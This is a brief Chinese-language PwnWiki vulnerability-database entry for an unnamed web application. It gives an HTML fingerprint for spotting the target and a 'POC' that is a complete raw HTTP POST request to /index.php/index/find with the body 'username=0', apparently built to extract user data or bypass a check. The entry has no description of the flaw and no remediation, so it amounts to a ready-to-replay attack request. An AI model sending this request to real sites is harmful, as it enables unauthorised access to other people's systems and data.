PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
特征
<a class="fl" href="/index.php/index/jie.html" ><img src="/public/jie/images/jk.png" /></a>
POC
POST /index.php/index/find HTTP/1.1 Host: <target> Cookie: PHPSESSID=xxxxxxxxxxx Content-Length: 10 Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91" Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: <target> Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: <target> Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close username=0
免费、自由、人人可编辑的漏洞库--PwnWiki.com
